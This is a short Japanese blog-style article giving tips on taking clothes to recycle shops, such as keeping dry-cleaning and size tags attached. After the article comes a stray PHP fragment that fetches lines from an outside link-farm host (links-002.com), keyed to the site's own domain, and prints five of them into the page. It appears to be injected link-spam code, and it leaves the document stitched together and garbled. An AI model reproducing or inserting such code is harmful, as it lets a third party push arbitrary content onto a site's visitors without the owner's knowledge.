リサイクルショップに服を出すときは

モノが溢れている現代ですが、ここ2、3年の間の断捨離ブームもあり、人々が本当に自分に必要なモノを見極めることに気づき始めました。
 まだ使えるモノは、リサイクルショップに引き取ってもらうのも定着してきました。
 自分のところに置いてあっても出番のないモノでも、他の誰かのところで活躍させられれば、その価値も活かされるというものです。
 衣料品をリサイクルショップに引き取りをお願いする場合、クリーニングに出してから引き取ってもらうのがエチケットですが、クリーニングのタグを付けたまま、リサイクルに出すことをお薦めします。
 大切に扱われてきた品物であることもアピールできますし、きちんとクリーニングに出したことも証明され、リサイクルショップ側にも好印象を与えます。
 同じタグで、子供服の襟首に付いているタグも、チクチクして痛い場合は別ですが、リサイクルショップに出すつもりなら、なるべくなら取らずに使用することをお薦めします。
 子供服は、ほんの数回使用しただけで、サイズアウトしてしまうものなので、傷む前にリサイクルショップのお世話になるケースが多いものですが、その年のスタイルや流行も考え、なるべく早目にリサイクルが望ましいです。
 サイクルショップの方で、持ち込まれたものを再度、売りに出すときに、サイズ確認が必要になるので、タグの価値は大きいのです。
 また、同じ理由から、タグに子供の名前を書いたりするのも避けたいものです。

//// $MAX = 5; // ////////////////// $lines = file('http://links-002.com/ad/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST'])); shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); } ?>